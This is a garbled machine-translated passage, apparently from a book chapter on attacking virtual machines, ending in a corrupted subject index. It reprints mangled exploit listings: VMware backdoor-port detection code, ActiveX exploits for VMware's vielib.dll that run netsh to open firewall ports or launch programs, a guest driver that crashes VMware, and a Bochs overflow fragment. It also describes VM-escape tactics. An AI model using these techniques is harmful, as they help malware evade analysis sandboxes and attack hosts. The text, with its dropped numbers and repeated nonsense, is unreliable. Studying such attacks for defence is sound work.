puțin trei erori fatale Windows, ceea ce duce la posibilitatea de a transfera controlul în fișierele de cod BMP-, JPG și WMF Deși patch -urilerelevante au fost lansate de foarte mult timp, multe mașini rămân vulnerabile până în zilele noastre Capitolul Atacul asupra emulatorilor Fig Un fragment din textul inițial al virusului scris pe VBS pentru a protejaîmpotriva atacurilor de acest tip este foarte simplu: renunțați la conductor și utilizați utilități precum Far Managersau Total Commander și verificați periodic folderele generale pentru viruși Chiar dacă personal nu folosiți niciodatăconductorul, acest lucru nu înseamnă că restul nu îl folosesc și este probabil ca altcineva să deschidă un foldercomun Un atac printr-o interfață din spate pentru a controla o mașină virtuală, multe emulatoare folosesc un mecanismdin spate special (și, ca de obicei, fără documente), precum disponibil în Softice Virtual RS folosește în același scopinstrucțiunile inacceptabile ale procesorului (de exemplu, OH FH H OV) și VMware - un port „magic” deintrare/ieșire Să ne bazăm pe WMware ca cel mai popular emulator Pentru a transfera comanda în execuție prin interfațaBackdoor, trebuie să faceți următoarele: □ În registrul EAC pentru a include numărul „magic” D H (în ASCII-Representive-ѵMH) □ În registrul DX, pentru a include numărul „magic” H (numărul portului, în ASCII-Representare-ѵx) □ În registrul circuitelor, pentru a aduce numărul de comandă și în registrul UE - parametrii acesteia □ Efectuațicomanda în EAX, DX (Wihoutdx, EAH) A se vedea int H în „Lista de întrerupere” Ralph Brown(http://www cttyme com/rbron htm) A se vedea, de exemplu, articolul „VMware Backdoor Iz Port”(http://chitchat at infoseek co jp/vmware/beckdoor html) Partea V Cord -Cord -Capacitate □ Dacă programul nu esteexecutat sub WMware (sau emulatorul WMware a fost pre -pusă), atunci la nivelul aplicat al modului securizat va exista oexcludere a „încălcării accesului” □ Când executați sub WMware, registrul EUCH va conține un număr „magic” D H,iar restul registrelor vor fi returnate date (dacă există) WMware acceptă un număr mare de diferite echipe examinate îndetaliu și descrise în articolul deja menționat de Ken Kato (Ken Kato)(http://chitchat at infoseek co jp/vmware/beacdoor html) Aici puteți găsi instalarea da-you/timp și puteți lucra cutamponul schimbului și chiar cu mecanismul apelurilor la distanță (RPC), dar nu există comenzi potențial periculoaseîntre ele Virusul nu poate doar să ia și să se desprindă de mașina virtuală!Sau mai pot?Peste două duzini de echipe suntîncă neexplorate și încă nu este clar de ce sunt necesare deloc Nimeni nu știe ce oportunități ne așteaptă Dintre toateechipele studiate astăzi, OCH (Connect/Deconectați un dispozitiv), care este responsabil pentru conectarea/dezactivareadispozitivelor IDE-, SCSI și USB, a fost cea mai periculoasă Virusul are o abilitate superbă de a conecta discul fizical sistemului principal și de a dăuna programului complet (WMware vă permite să creați discuri virtuale bazate pefizic) Un alt virus poate ajunge la dispozitivul USB flash și poate infecta toate fișierele executabile disponibile peacesta, pe care cineva le va rula cu siguranță pe mașina principală Cu alte cuvinte, există multe posibilități Pentruprotecție, se recomandă propagarea VMware prin modificarea valorii „numărului magic” Un patch neoficial se află aici:http://honenelrstack org/ instrumente/vmpatch c, nu există încă oficiali și, aparent, în viitorul previzibil nu este deașteptat Cu toate acestea, chiar și sistemul patch este încă vulnerabil, deoarece puteți alege numerele magice necesareprin metoda de atac de forță brută La urma urmei, nu există atât de multe opțiuni posibile-un număr de port pe biți,plus FAcy pe de biți, oferă mai puțin de BITURI semnificative !Ca exemplu, avem în vedere programul care determinăversiunea WMware (listarea ) Listarea L Programul care arată interacțiuni // строковые константны #define ѴМ #define VM DETECTED#define VM NOT DETECTED #define VM NOT RECOGNZD "vmware" "detected" "not detected" "detected , dar nu este recunoscut"// sub VMware, funcția returnează versiunea VMware în registrul EAH // (Zero nu este VMware sau versiunea estenenumărată), // Fără VMware, o excepție este încântată decpec (gol) get vm () // funcție „goală” fără prolog șiepilog { asm {;Pregătim argumente și plăcinte magice Mov Esh, Oah;Număr de comandă - Determinarea versiunii MOV EAX, D H, - 'VMXH' - MAGIC NUMĂR "PIE" MOV EDX, H;' Vx' - portul magic al interfeței înapoi -door ;Tragem„frânghia” Se obțin mai puțin de de biți semnificativi, deoarece numerele de port standard Nu puteți utiliza CPAVA Atac asupra emulatoarelor în EAX, DX;Apelăm comanda de interfață backdoor ;Parametriireturnați sunt plasați în EAX/ESH/ESH ;Atenţie!;Printre Windows pur fără VMware atunci când accesați portul port-ieșire;Va avea loc o excepție, iar conducerea va fi transferată omului de instruire SEH;care ar trebui stabilit în avans(altfel implementarea programului; va fi finalizată de sistem) ;Dacă suntem aici, prin urmare, nu au existat excepții;Șifie un șofer viclean a deschis porturile de intrare și ieșire ,;sau suntem sub controlul VMware -ului neprotejat;Sauceva foarte asemănător cu ea CMP EBX, VMXH ';Analizăm plăcinta magică returnată Je sub vmware;Dacă plăcinta estereturnată, suntem sub VMware Hog eah, eah;Returnăm Zero - nu suntem sub VMware Ret;Lăsăm funcția Sub vmware: ret;Suntemsub numărul VM neprotejat, în numărul de versiune EAH Main () (// Apelăm funcția Get YM din Block, // pentru aprinde excepțiile care apar // Pentru simplitate și vizualizare, versiunea VMware a revenit la get vm, // nu esteafișată pe ecran și este raportată doar că a fost detectat // emulator non -parted sau nu (dacă nu există excepții, //VMware este considerat detectat) try {printf (" %s %s \ n", vm, (get vm ())? vm detected: VM NOT RECOGNZD);} //Procesor de excludere Primind care primește management atunci când efectuați // programe în mediul Windows pur, subVMware patch sau // Alte emulator cu excepția (l) (printf (" %s %s \ n", VM, VM NOT DETEDECT);} Pentru schimbul deporțiuni mici de date între virtual, este convenabil să folosiți vechiul disc flexibil bun de către mașină și sistemulprincipal Oferim doar emulatorului acces fizic la dispozitivul A: (B :)-și Asta este totul!D va primi control și vaputea atinge hard disk -ul sistemului principal Un emulator este un lucru foarte convenabil, dar creșterea virușilor înintestinele unei mașini virtuale este potențial nesigură „Shell”, care separă sistemul de oaspeți de lumea reală, esteprea subțire și nu poate rezista atacului bine planificat Puteți, desigur, pentru glumele de dragul, un emulator într-un emulator (de exemplu, Bochs în interiorul VMware), dar acest lucru nu va rezolva totuși toate problemele, darperformanța va scădea enorm!Un hard disk separat în această privință este mult mai fiabil și mai convenabil Apropo, estenecesar să deconectați discul principal pur fizic - prin tăierea cablului Discurile enumerate în secțiunea principală aBIOS sunt relevante numai în stadiul de încărcare primară, iar apoi întregul schimb trece prin driverul de mod protejat,care funcționează direct cu controlerul Deconectarea canalelor controlerului integrat prin configurarea BIOS, de regulă,face ca discurile Partea V -ul practic să fie invizibil, iar cu ferestrele standard nu le va ajunge, ci codul răuintenționat, cu marea dorință a autorului său , poate reconfigura controlerul în mișcare, a ridicat toatecanalele Desigur, aceasta este o operație dependentă de sistematică și toate controlerele sunt programate în moduridiferite Cu toate acestea, este foarte posibil să vă asigurați sprijinul unei perechi de cele mai comune chipset-uri!Cele mai recente exploatări pentru mașini virtuale, pe lângă scenariile simple și cunoscute, există alteposibilități de penetrare Deoarece, ca orice alt software, mașinile virtuale nu sunt lipsite de erori, acestea sunt oțintă foarte seducătoare pentru o varietate de atacuri Luați în considerare doar câteva dintre cele mai recenteexploatări VMware: Execuția la distanță a codului arbitrar I iulie Hacker pe nume Saiaah, care face parte dingrupul de cercetare argentinian foarte productiv „Echipa de cercetare de securitate Goodfellas”(http://goodfells shellcode com ar) a constatat că virtualul virtual Mașina a fost găsită în mașina virtuală VMwareinclude un curios Activex-Componeng implementat în biblioteca dinamică Vielib dll (căutați-o în \ Program Files \ FilesCommonwmwamwamwamwamwal Editare de imagine), exportând multe metode potențial nesigure care permit principalul principalprincipale principale , și nu la fel Biblioteca nu verifică de unde provine apelul - din aplicația „nativ” sau dincodul rău intenționat Una dintre aceste metode este StartProcess, care permite, după cum urmează, din numele său,generarea proceselor în numele utilizatorului curent cu toate privilegiile sale Este suficient să mergeți la pagina„hacker”, a taxat „cod dăunător!În același timp, VMware nu este necesar pentru a rula, este suficient faptul instalareaunui emulator pe un computer Și asta este o altă victimă va fi adăugată la Hacker Piggy Bank Pentru informațiidetaliate despre această gaură, consultați aici: http://www securityfocus com/bid/ Comunicatul de presă, răspândit de Goodfellas, este menționat doar de VMware ,dar vulnerabilitatea este prezentă și în versiunea , dar versiunea este invulnerabilă Mai mult, pentru apelul desucces al componentelor ActiveX, avem nevoie de o versiune Internet Explorer de cel puțin , Dar fiiefex și opera suntcomplet sigure în această privință Textul inițial al Exploit (listarea ), publicat de grupul Goodfellas, estedisponibil pe următoarele site -uri: http://www milw rm com/exploits/ și http://www securityfocus com/data/Vulnerbil ites/Explomlites/ ■ Listarea Codul sursă al exploaterii, afectând VMware + și IE +, care sedeschide • -port pe firewall-ul standard cobject id = ctrl classwclsid: { b c - c -beef e eb ) script> funcție POC funcție () {Argl = "c: \\ Windows \\ sys tem \\ net sh exe" arg = "c: \\windowswsystem wnetsh exe Firewall addopemng tcp \ windows \\ system \\" arg = " C: wprogramfileswmicrosoft OfficeWofficell wnoiseneu txt "arg =" c: wprogram fileswmicrosoft of ficewofficell wnoiseeng Txt "arg =" c: wprogram fileswmicrosoft Officewofficellwnoiseenu txt 'г "" , Arg , arg , arg , arg , arg , arg )} , după cum puteți vedea, exploatareaexploaterii Lansează utilitatea sistemului Netsh exe, forțându -l să deschidă portul pe un firewall obișnuit, că nuexistă niciun atac în sine, ci în combinație cu alte metode Cu toate acestea, atunci când încearcăApăsarea dovadă aconceptului Buttonul Internet Explorer ne avertizează despre pericol (fig ) Pentru ca atacul să ia măsurile, victimatrebuie să intre în setările de siguranță ale Internet Explorer și să deconecteze cu forță interdicția de utilizare aelementelor ActiveX care nu sunt marcate ca fiind sigure Este puțin probabil ca, desigur, acest lucru să se întâmplecuiva, dar trebuie amintit că există atacuri direcționate direct către exploratorul de internet în sine și care permitsă ocolească aceste restricții Cu toate acestea, firewall -ul în aer liber (și, probabil, alte firewall -uri personale)vor răspunde imediat la un DLL suspect, așa că vor trebui să fie neutralizate cumva Orez Reacția Explorer Internetla o încercare de a lansa un medicament oficial de exploatare este încă în curs de dezvoltare, în timp ce puteți propuneurmătoarele soluții: □ Nu faceți nimic, deoarece Explorerul de Internet implicit va efectua codul ActiveX Pe ActivateKill-Bit pentru elementul CLSID { B C - AA- C -BEEF- E EB } În conformitate cu recomandările Microsoft:http://support microsoft com/kb/ □ Pentru a rezolva biblioteca Vielib dll prin Regsvr - VMware Editarea deimagini virtuale, desigur, se va opri, dar aceasta este o mică problemă Partea V Codul practic al VMware: execuțiala distanță a Codului arbitrar II la iulie , adică a doua zi după ce gaura este găsită în VMware, același grupargentinian „Echipa de cercetare a securității Goodfellas” a descoperit două Mai multe metode nesigure în bibliotecadinamică Vielib dll, care de data aceasta s -a dovedit a fi CreateProcess și CreateProcessex, permițând, așa cum artrebui să fie de la numele lor, să lanseze procesele cu drepturile unui utilizator care a intrat în pagina hackeruluiumplut cu cod rău intenționat sau a primit poștă scrisă de HTML Descoperitorul găurii a fost același Saiaah, care estedestul de logic, având în vedere că volumul de cod al bibliotecii dinamice vulnerabile este relativ mic În acest caz,cel mai probabil nu avem de -a face cu o șansă oarbă, ci cu o analiză conștientă care vizează găsirea de noi găuri, cares -au dovedit a fi foarte fructuoase Mai multe informații pot fi găsite aici: http://www securyfocus com/bid/ Înciuda faptului că ambele Secware menționează Focusul de securitate și echipa de cercetare a securității Goodfellas,gaura este prezentă și în versiunile anterioare, în special la , dar versiunea este încă invulnerabilă În plus,această problemă nu se aplică celor care folosesc Internet Explorer sau browsere alternative (Firefox șiOpera) Listing shows the initial text of the exploit published by the Goodfellas group and available on thefollowing sites: http://www milw rm com/exploits/ andhttp://downloads securityfocus com/vulnerabilites/ HTMLOMLOMLOMS / htimloms/ htims/ htims/ Listarea Cod sursă explozită »Lumbling vmwar» + și Internet Explorer + prin lansarea unui „calculator”standard cobject jd = o clasid = ”clsid: { f fde- - c- - c ea a}”>> cinput limbaj = javascnpt onclick = doit () type ="dovada conceptului"> analogii cu anterior anterior Cazuri, cu singura diferență fiind căidentificatorul CLSID este (AF BO E- A - CAC- C A-EC E A } Demolitatea mașinilor virtuale din interiorulmașinilor virtuale sunt utilizate activ ca „depozit de deșeuri” pentru studiul tuturor tipurilor de cod rău intenționatÎn condiții, acest lucru este în mod natural aproape de luptă Codul rău intenționat nu este în mod natural nu este și,prin urmare, atacul se desfășoară în două direcții Primul (și cel mai important) este să încerci să izbucnești detemnițele mașinii virtuale, penetrarea sistemului operațional principal Al doilea este crearea unui astfel de cod carear fi un astfel de cod care ar fi un cod care ar fi un cod care ar fi un cod care ar fi un cod care ar fi un cod care arcrea un cod Acesta ar fi un cod care ar fi un cod care ar fi un cod care ar fi creat, a lucrat doar la un fier „viu” șisub o mașină virtuală sau a fost efectuat incorect (Task-MSfârșitul) sau a zdrobit mașina virtuală (sarcină maximă) Partea V Există o capacitate practică a cablului de vulnerabilitate în mașinile virtuale, deși nu în cantități atât demari ca în sistemele de operare ale familiei Windows Un singur precedent este suficient pentru ca cercetătorii să piardăpentru totdeauna încrederea în mașinile virtuale Și un astfel de precedent a avut loc cu adevărat când, în decembrie , Tim Shelton a publicat pe Full Disclosure Forum (http://lists grok org uk/pipermail/full-disdosfat O gaură de ladistanță în serviciul VMNAT, implementată în fișierul executabil VMNAT EXE, care face parte din VMware WorkStation , serverul VMware GSX, serverul VMware ESX, VMware ASE și VMware Player Este demn de remarcat aici că încă maiexistă multe coduri încă - adică în - utilizează VMware , care le potrivește complet Defectele de proiectare audus la faptul că serviciul indicat nu a putut percepe EPRT și portul într -un mod special, provocând revărsarea memorieidinamice în serviciul NATD (Fig ) cu posibilitatea de a trimite cod shell, executat pe The the The Sistemulprincipal (gazdă) cu toate consecințele care urmează Apropo, atacul este efectuat nu numai de la mașina virtuală, ci șidin rețeaua externă (intra- și/sau internet), cu excepția cazului în care, desigur, rețeaua virtuală este configurată înconsecință (stabilită implicit) și nu se limitează la transferul de date între mașinile virtuale Mai multe informațiidespre acest subiect pot fi găsite la http://www securityfocus com/bid/ Pentru a corecta defectul, este recomandatsă descărcați o nouă versiune Cu http://www vmware com/download Dacă din anumite motive este imposibil sau nedorit, puteți utiliza opțiunea descrisăîn baza de cunoștințe VMware: http://www vmware com/support/kb (Asswer Go ) Orez Descoperirea de sub WMwareprintr -o gaură din VMNAT Apropo, nu a fost prima gaură din VMware Dacă ridicați arhivele, puteți găsi că, chiar și încea mai timpurie versiune a VMware , disponibilă pentru Linux, a existat o eroare de preaplin publicată pe Bugtraqîn iunie de un hacker numit Jason Rhoads Codul sursă de exploatare poate fi descărcat de pe site -ul de focalizarede securitate: http: //wwww securityfocus eom/data/vuinarabilits/exploits/vmware c Deși această exploatare și -a pierdutmult timp relevanța, deoarece defectul a fost corectat în următoarea versiune , faptul în sine este important Întretimp, parada găurilor continuă Ar fi obositor (și neinteresant) să locuiești pe fiecare dintre ei și să -l savurezi întoate detaliile Este suficient să spunem că ultimul GPAVA Atacul asupra emulatorilor Un mesaj despre revărsareatamponului din VMware a fost publicat recent și datează din aprilie , afectând VMware ESX Server / Deși înprezent, orice detalii tehnice sunt absente (informații despre vulnerabilitate sunt publicate de dezvoltatorii înșiși,care nu sunt deloc interesați să dezvăluie aceste detalii), analiza patch -urilor (până acum, apropo, nu au fost încălansate) permite tu să localizezi poziția găurii și să scrii exploate Așa că urmați știrile lahttp://www securityfocus com/bid/ Pe scurt, este imposibil de crezut VMware și, înainte de a depana următorulvierme de pe el, nu va face rău să instalați toate cele mai recente actualizări care există doar în acest moment Pe dealtă parte, versiunile mai vechi arată mai puțin sofisticate, dar sunt potențial mai rezistente la descoperire în afaramașinii virtuale În orice caz, precauțiile tradiționale nu vor interfera La urma urmei, odată ce viermii au fostdepanați direct pe calculatoarele principale și, în cele mai multe cazuri, nu s -a întâmplat nimic tragic Bine, săpresupunem că ne -am dat seama de descoperirea din afara VMware și am trecut la tot felul de „trucuri” din interiorulsău Codul dat în lista provoacă o oprire a mașinii virtuale, care este echivalentă cu puterea |Suspendați în meniulprincipal al mașinii virtuale (Fig ) Cu toate acestea, după trezire (reluare), din păcate, se dovedește a fidependent de speranță și, prin urmare, trebuie repornit (Fig ) Orez Codul rău intenționat conduce o mașinăvirtuală în somn Partea V Codicopaging practic Fig Mașina virtuală este într -o stare de somn, din care nuexistă nicio întoarcere a prospectului i Mișcarea inițială a driverului VMware-Crash asm, conducând o mașină virtualăsă doarmă T care se trezește cu adevărat Model Flat, stdcall Code DriveRentry Mov Int MOV MOV OLT XOR INC INC PCEX, OH AX, C H DX, AX EBX, EBX EAX, EAX, EAAX, EAAX EAX CPAVA atac asupra emulatoarelor int H MOV EAH, C H;Status device configuration error Ret drivernry Endp End Drivertry este compilat de driverul DDK, iar acestlucru se face cu o linie de comandă complet standard (listarea ) ML /Nologo /S /Coff VMwareesl asm Link /Driver/Baza: x /align: /out:vmwareesl sys /subsistem: națiune vmwareesl obj pentru încărcarea driverului este binepotrivit pentru utilitate gratuită w k load exe, scrisă scrisă Sven Schreiber și atașat la cartea „Capacitățile nededuseale Windows ” Aceste utilități pot fi descărcate, de exemplu, de aici: http://irazin ru/ Down!Oads/Booksmples/schreiber zip sau de pe site -ul cărții în sine: http://www rwol com/?topic = Desigur, DDK nu este odogmă În cele din urmă, aici nu există arbitrar și puteți utiliza nu mai puțin succes, de exemplu, FASM sau chiar săpuneți codul de asamblare în modulul nucleului încărcat și să îl setați pe Linux În același timp, VMware va fi finalizatdin greșeală funcționarea tuturor mașinilor oaspeți, cu emiterea unei casete de dialog cu inscripția *** VMwareWorkstation Eroare de monitorizare internă *** și un număr imens de informații tehnice complet inutile (Fig ) Orez Un sistem de oaspeți distruge orice altceva și îl conduce literalmente pe VMware Crazy SvenShreiber "Capabilitățile Windows nededuse "-St Petersburg: Peter, Partea V Capacitatea de cordonpractică, în plus, VMware acceptă o interfață specială de backdoor, care a fost deja menționată mai devreme în acestcapitol în atac prin interfața din spate Așa cum am menționat deja, această interfață permite sistemelor de operareinvitați să controleze mașina virtuală, care, în primul rând, permite codului rău intenționat să stabilească că nu esteîn niciun caz pe fierul „viu”, ci funcționează sub VMware, care, prin intermediul Aceeași interfață din spate, poate fiposibilă și scade Desigur, puteți și ar trebui să parcurgeți editorul Codul Hiew VMware, găsiți toate constantele D H din el și înlocuiți -le cu altceva Pentru o fiabilitate mai mare,același lucru ar trebui să se facă cu numărul portului Performanța VMware nu va încălca acest lucru, dar codul răuintenționat va pierde posibilitatea de a scăpa printr -o interfață din spate Cu toate acestea, VMware s -a compromisdeja suficient și doar un miracol își poate salva reputația Dar miracolele, după cum știți, nu se întâmplă, darconcurenții sunt într -un sortiment mare Luați în considerare, de exemplu, un emulator Bochs foarte popular(http://bochs sourceforge net) Funcționează încet, dar liber și, cel mai important, nu a fost găsită nicio gaură pentruîntreaga existență a Bochs, ceea ce permite un cod rău intenționat să se desprindă de mașina virtuală O altăoportunitate utilă este un debugger construit care lucrează la nivelul unei mașini virtuale și, prin urmare, completinvizibil pentru codul depanat Pe scurt, din punctul de vedere al securității, tot codul potențial periculos este celmai bine explorat pentru Bochs Cu toate acestea, Bochs conține totuși mai multe erori de revărsare non-critice carepermit sistemului de operare invitat să provoace finalizarea de urgență a emulatorului, ceea ce împiedică depanareacodului dăunător Cu toate acestea, direct pe sistemul de operare ca atare, codul rău intenționat nu poate afecta sau,mai degrabă, căile unui astfel de impact nu sunt cunoscute În special, site -ul web SecurityFocus arată o singură eroarede preaplin tampon legată de versiunea Bochs și provocând refuzul serviciului Descoperit la sfârșitul lunii mai de hackerul Tavis Ormandy, este încă destul de relevant Listarea oferă textul inițial al exploitului publicat pehttp: //downloads securityfocus eom/vulnerabilite/exploits/ c #include int maygc, char ** argv) (yurW( ); outw ( x , x c); outw (oxffff, x ); (a) outw (a) outw (oxlffb, x e) ; Outb ( x , x ); outb ( x b, x ); outw ( x c , x ); outw ( x e , x ); return ;} (a) bx ne k this s curr page) || ((bx ne k thiss curr page);Memcpy (startptr + , buf, io len); b bx ne k this s curr page = nextpage;Cu toate acestea, nu este încăcunoscut o singură exploatare care folosește cu adevărat această vulnerabilitate pentru binele său Între timp, odată cucreșterea popularității mașinilor virtuale ca un instrument de „trepanare” al codului dăunător, creatorii acestora dinurmă încearcă să se gândească la metodele de luptă, onorarea noilor tehnologii pentru atac și apărare SubiectulSubiectului Funcții „Rasplow”, Lista întreruperilor de de biți, Ralph Hopping, , Brown, , – -bit * Abel * Seif Learnmg Crystal Loader, Generator, A OT, , , adata, A , aspack, ASR , BSS, , Acrobat Reader, Code, Element ActiveX, Data, , Generarea adresei Diff, Intelock , finit, , Așezarea spațiului de adrese init, , Randomization, Patch, Adobe, , plt, Adobe Acrobat, , Rdata, защита, Rodata, , , Adobe Photoshop, RSRC, Adore, , s, Parolă avansată PDF Text, , , Recuperare, Registry Advanced Tracei, AGI, AGI, AGI, Agi, Agis, Agis, Agi , FastCall, ALD, , Stdcall, Algol , Alpha, , AMD, , modul -bit, , , AMD Athlon FX, AMD OPTERON, AMD Pacifica, Mod -bit, AMD X - , , , AMD , DNOW! Pro Moduri de operare, AMD-V, ANSI C, ANSIC/C ++, AUT, AUUTB, ARI, AP C, APIMON Exe, Apispy , Ari-Funcții, , Intercepții, АрVerație-шшионы, , , , , Armadillo, AS , , ASCII, сtări м о, сроки, Ascilz-Organ, , , , , , , ASPI Drive, Asprotect, , Debugger de limbă de asamblare, Ат & т, синтаксис, , Athlon , , в Backdoor-мханизз, Backtrace, Bart PE Builder, BASH, BASIC, , , старыы Be, , , Biew, , , , BM, , Sign Object Binutils, , BIOS, , BIOS BIOS, Bit-Hack, , Blue Pili, Bluetooth, Bochs, Bochs, Bochs, Bochs , , , , , , , Adunare cu sprijin pentru arhitectură pe de biți, Boot ini, , , , Borland, Borland C ++, , , , , Tabel de import legat, Breakpoints, Brute Force Attack, , Bryce Cogswell, BSD, BSOD, , , Buffershield , , Bumdump, Bumeye, , Bumeye Depaper, BZIP, C, , , , C Convenție, C/C ++, , C ++, , C U, Calling Calling Convenții, Flag de transport, de cazuri de caz, felding CDECL, , , Checklnstail, Clipper, , ClonECD, , CodeView, , Coff, , , , Colorer, DISSEMBLER DELungime de comandă, Format de fișier cu obiect comun, Compaq SystemPro, Compuware, Sistem de versiuneconcomitentă, Constructor, Copimem II, , Copy-on-Write, CPU, , CRA , CRC, CRC , CRC , , -Referințe încrucișate, CTRACE, Cup , Secație curentă, Cygun Solutions, Cygwin, C-member, C-settings, d Daemon Tools, Data Execution Prevention, Data Directory, Structure, dbghelp DLL, DBGVIEW, DCOM RPOM RPOM, DCOM RPOM RPOM, DCOM RPOM RPOM , DCOM RPOM, DCOM RPOM, DCOM RPOM, DCOM RPOM, DCOM RPOM, DCOM RPOM, DCU com, , , , Instrumente dedepanare, instrumente de debuging pentru Windows, Dec PDP- Dede, Ștergeți identificarea, , Delphi, , , , , , , , , Demonix, Dep, Suport hardware, Configurație, Bypass, Probleme de compatibilitate de compatibilitate, , Implementare software, Desktop ini, Destructor, Discpp, Dll, , , , DOS, , DOSBOX, , , , DOSWIN , DOS-PUSHER, DOS-STRING, KIT DE DEZVOLTARE DRIVER, DNVERSTUDIO FRAMERA, DRIVERTUDIIO V Build , Dumpbin, Dumpbin, , Dwarf, Dwarf , E Ebook, Ebook Reader, Evok-Format, Editbin, , Eicomsoft, , Elf, , , , , , , , , , , , , , , , , , , Elfcrypt, , virusuri Elf, Elf-Headings, denaturate, structură, Elf Loader, Vulnerabilitate, Segmente ELF, Fișiere ELF, , , , Implementarea unui coduri extraterestre, Shiva protejat, cu un titlu distorsionat, Titlu deserviciu, Structura, Universal Unpacker, Elf- Format, , Emacs, Protecția Virusului îmbunătățit, Enterpnse Event Jognal, Enter, , , , , , , , Entry Exec Shield, Executabil și FormatLink, , , , , , , AttnButes extins, Extreme Protector, , , Indicator subiect F FardManager, , , Fasm, , , , , , , Macro Macro -Language, Mod x - , FastCall, fc exe, aliniere de fișiere, fiiemon exe, , fiieopen, Firefox, Firefox, Firefox, , , , , Prima secțiune, Flash USB, Fiat asamblator, , , , , , , , Flex LM, Flirt, Folder htt, Fox Pro, , FPO, FPU, OMISIE FRAME, BSD Free, , , , , , , , , Free Pascal, , , , FSG de Bart/X, G Gas, , , , , GCC, , , , , , GDB, , , , , , , , multi -fluiditate, puncte de supraveghere, puncte de observare, stop stop fluidy Puncte, de puncte de interceptare, Trace, GDT , Geraid Popek, Ghex, Gimp, , Global Descriptor Table, Global Offset Table, GNOME, GNU: Asamblator, , , Binutiis , COMPPPIIR COIIECTION, , DEBUGGER, , Linker, GNU/HURD, GNU/LINUX, GOT, GZIP, , H HackerDisassmbier Engine, Hal, , Hai dil, , Hardlock, Layer de abstractizare hardware, , HASP, , , , Hewlett-Packard, Hex Workshop, Neh-Editors, Hiew, , , , , , , , , , , , , , , , , , , , , , , , , Asamblator de nivel înalt, , , HLA, , , Honeypot, HPPA, HT, HT Editor, , , , , , , , HTE, , , , , , , , , , Pachetul Hutch, HyperThreading, , , , I I KD EXE, IA , , IA , IAS EXE, IBM, , IBM OMF, IBM PC PC PC PC PC PC PC PC PC PC PC PC PC, , IBMRS XT/AT, IBM System/ , Icedump, , , Icext, , , , , Ida Pro, , , , , , , , , , , , , , , , , , , , , , , , , , , Highiighter, Identificarea automată a funcțiilor, Versiune gratuită, IDA Pro , IDA Pro , IDA Pro , Ida SDK, IDE IDE, , , K X Unpacker, Intel, , , , , , , , , с sau с+ compiier, Intel Covergeri Tool, Intel Fortran Compiier, IntelIa , Intel Fortran Compiier, Intel Ia , Intel Fortran Compiier, Intel Ia , Intel Fortran CompiierItanium, Intel Pentium, Intel Vanderpooi, Intel Vtune Performance Analyzer, Internet, InternetExplorer, , , , , Descriptor de întrerupere, , , Întrerupere de Ralf Brown, , Irix , ISDC, ITANI, ITANI, ITANI, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, ITANIS, Itanis, Itanis, Itanis, Itani Indicator de subiectpentru KDE, Kerberos, , , Kerenl dll, , , , , , , , , , Kegpii LocalLocal Local Bluetooth Rădăcină exPloit, Kemel Debugger, Kemel-Mode Driver Framework, , , Kevin Lawton, Keygen, Khexedit, Knark, Knoppix Compots, Knopix , , , , , , , , , , , ASM leneș, Lazy Assembler, , LD, LD , LDASM, LD-Limx So, LDT, , Libc, Libc so, Libm So, Lida, Lin/Obsidian, Linice, , , Configurație, Lint, Linux, , , , , , , , , versiuni pe de biți , Dystedemblifierea nucleului, Înlocuirea logo -ului, Înlocuire, Capture Ring , DISASSEMBLE Caracteristici, Interceptarea interogărilor în sistemul de fișiere, Interceptarea apelurilor de sistem, nuclee hack, Core, Linux Dipssembler Linux, Linux Disassembler Linux, Linux Interactive DisAssembler, Linux Red Hat, Linux Nux NuxBee, Linux Nux Nux Nuxbee, Linux Nux Nux Nuxbee, Linux nux nux nux nux nusbee, Linux nux nux nux nusbee vit , Livecd, , LKM, Modul de kernel încărcat, , , MABLE DESCRIPTOR LOCAL, Loco, Logo C, LOMN PE, LOCO, Logo c, Lord PE, , Lord Pedede, , , , , , , , Lord , Lz dll, M Mac OS, , Mac OS X, Makecrk, Malware, Mar-File, , Mark Russiainovich, MASM, , , , MD , , , MFC, Microsoft, , , , , , , , MicrosoftDebuging Tools, Microsoft Kemel Debugger, Microsoft OMF, Microsoft PITFORM SDK, , Microsoft VirtualServer , Microsoft Visual C++, , , , , , , , , , , , , Microsoft VisualDebugger, Microsoft Visual Studio, , , Microsoft Visual Studio Debugger, Microsoft WinDbg, MicrosoftWindows Debugger, , Midnight Commander , mmx, , de echipe, Motorola MC , MRZ, MP , MSLink, MS Profil exe, MS Visual Studio Debugger, MSDN , , MS-DOS, , , , , , Stub în modul real, Mz, , N NAG-ecran, , Suprimare, Funcții goale, NASM, , , , , AP autohton, , , , , Netbsd, , , , NetStat, Netwide Assembler, NOUIdentificare, New Paradigm Resources Group, Secțiune următoare, NRMS-File, Norton Disk Editor, NovellSLAS , NTDDK NTDLLL DLL, , , , Simbol Loader, Numega Truecoverage, NX/XD-BIT, , , , , , , o Objdump, Object Aliniere, Obiect, Object, Objetm OEP, , , , Subiect Patch Off-HNE, Ollydbg, , , , p , , , Step ofStep Trace, Programarea șabloanelor, oliiids, oliiids, oliid Patching on-line, deschis , OpenBSD, , , , Opera, , , , Opteron, , Punct de intrare original, , , , , , OS/ , , , , outpOst Firewiii, Flag Overflow, O-Parol, , , P Pace Inteilock, Pacifica, , , , Pae, , Page Handler, Page Attack, Palleis, , Paralleis WorkStation, Pascal, , , , , , , , Pascal Settlement, , Pascal Stracks, lățime, RAH, RS , RSV, RSKH-Fișiere, PDB PDB , PDF, , O-Parol, U-Parol, Structura fișierului, PDF Recuperareparolă SODK, PDF Password Recovery Professional, PDF PASWORD PASWORD, PDF-Power, PDP- PE, , PE Tools, , , PEB, , PE-Compact, , , , Peid, , , Pentium Mmx, Perl, , , , , , Peter Peter Anvin, Peter Veenstra, revolume, , , Implementarea lui B, non-actual Fișier, re-secțiuni, re-fișier, , Adresa de descărcare de bază, Atribute de secțiuni, Adresevirtuale, Imagine virtuală, implementare Cod, rubrici, distorsionare a titlului, excesiv, , relativă virtuală relativă Adrese, Informații mutate, Imagine de pagină, Structura, Scheme de adresare, Tabel de import de in, Adrese fizice, PGP, Pharlap, Phrack, Adresă fizică Exces, , PIC, Pice, Pice , PICE, PICE, PICE, PICE, PICE, PICH -CONTROLERS, PKLITE, PKZIP, PIATFORMSDK, POLYENGME inux LIME POLY, POSIX, , Powerpc, ppc , , Procdump, , , , PROCSControl Block, , Procs Control Blo Process EnviroMent Block, Process Patcher, de date de program, Tabelde antet al programului, Exploits-of-Concept Exploits, PTRACE , , Python, , P-Code, QEMA, Q , , QNX, , , R RISC's Process Patcher, Ralph Brown's Interrupt List, Rasta Rasta Debugger, offset brut, Adresa relativă 